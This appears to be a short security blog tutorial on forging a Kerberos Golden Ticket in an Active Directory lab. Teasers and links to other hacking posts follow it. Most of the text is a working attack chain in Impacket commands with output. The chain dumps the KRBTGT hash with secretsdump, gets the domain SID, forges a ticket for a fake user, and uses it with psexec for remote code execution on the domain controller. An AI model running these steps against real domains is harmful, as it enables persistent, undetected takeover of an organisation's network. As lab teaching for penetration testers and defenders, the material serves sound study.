microsoft

Golden Ticket

David Johnson

12 Mar 2024 — 1 min read

Golden Ticket

This document covers how to create a Golden Ticket. An Active Directory
Domain server is required for this to work. Connected clients are useful
but not required.

Creating the Ticket

To create a Golden Ticket the NT Hash for KRBTGT will need to be aquired
as well as the Domain SID. All this can easily be done with Impacket.

KRBTGT NT Hash

Lets start off by getting the KRBTGT hash. The following script will
write our desired information to a file called win2016 in the ~/
directory.

secretsdump.py Administrator:vagrant@192.168.64.133 | grep krbtgt | grep ::: > ~/win2016; cat ~/win2016

Domain SID

To get the domain SID use lookupsid.py and grep to filter out just the
information needed. Again that information is writen to the win2016
file.

lookupsid.py Administrator:vagrant@192.168.64.133 | grep "Domain SID" >> ~/win2016; cat ~/win2016

Domain Name

There are times when we forget which domain we are on. To limit errors
we will not assume the domain name but rather get it from the machine.

echo "powershell Get-WmiObject Win32_ComputerSystem" > ~/GetDomain.bat

Now execute this bat file on the target.

psexec.py Administrator:vagrant@192.168.64.133 -c ~/GetDomain.bat | grep Domain >> ~/win2016; cat ~/win2016

Create Ticket

With all the nessassary data create a ticket.

ticketer.py -nthash 4031b5ae4b9defa1f411f26610493e0c -domain-sid S-1-5-21-126282473-2140987555-3925513934 -domain Win2016.local baduser

Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for Win2016.local/baduser
[*]         PAC_LOGON_INFO
[*]         PAC_CLIENT_INFO_TYPE
[*]         EncTicketPart
[*]         EncAsRepPart
[*] Signing/Encrypting final ticket
[*]         PAC_SERVER_CHECKSUM
[*]         PAC_PRIVSVR_CHECKSUM
[*]         EncTicketPart
[*]         EncASRepPart
[*] Saving ticket in baduser.ccache

Use the Ticket

To use the ticket with psexec.py the ticket needs to be exported.

Export the Ticket

The ticket will need to be exported to be able to use it with psexec.py.

echo "export KRB5CCNAME=/vagrant/docs/baduser.ccache" >> ~/.bashrc
. ~/.bashrc
tail ~/.bashrc

Use the Ticket With Psexec

Below we use the ticket against Win2016.

export KRB5CCNAME=/vagrant/docs/baduser.ccache; psexec.py -dc-ip 192.168.64.133 -target-ip 192.168.64.133 -no-pass -k Win2016.local/baduser@Win2016.Win2016.local

Firewalls, IDS, IPS and Nmap

To prevent unathorized access and malitious attacks on a network system administrators have a few options in their arsinal. Firewalls and Intrusion Detection/Prevention Systems are the main line of defense in this situation. These defenses are effective when configured properly. However, every defense has its weakness. Understanding the limitations

Bash Breakout

Breaking out of a restricted shell is a significant step in ethical hacking and penetration testing. However, sometimes you find yourself in a limited or non-interactive shell environment where essential features like command history navigation and screen clearing don't work. In such cases, upgrading to a fully interactive

A Piece of Cake

Security is a piece of cake. Just imagine a piece of cake sitting there, all delicious looking. You want that piece of cake, but you have to study first. You want to keep this cake secure. You don't want anyone finding, eating, or stealing it. You don'

Behind The Scenes

The first thing I did was to open up Ghidra and decompile the binary then look around. I usually start by looking at the main function and that's what I did here. I noticed something a little odd, there was a function called invalidInstructionException. I wanted to look

Golden Ticket

Creating the Ticket

KRBTGT NT Hash

Domain SID

Domain Name

Create Ticket

Use the Ticket

Export the Ticket

Use the Ticket With Psexec

Read more

Firewalls, IDS, IPS and Nmap

Bash Breakout

A Piece of Cake

Behind The Scenes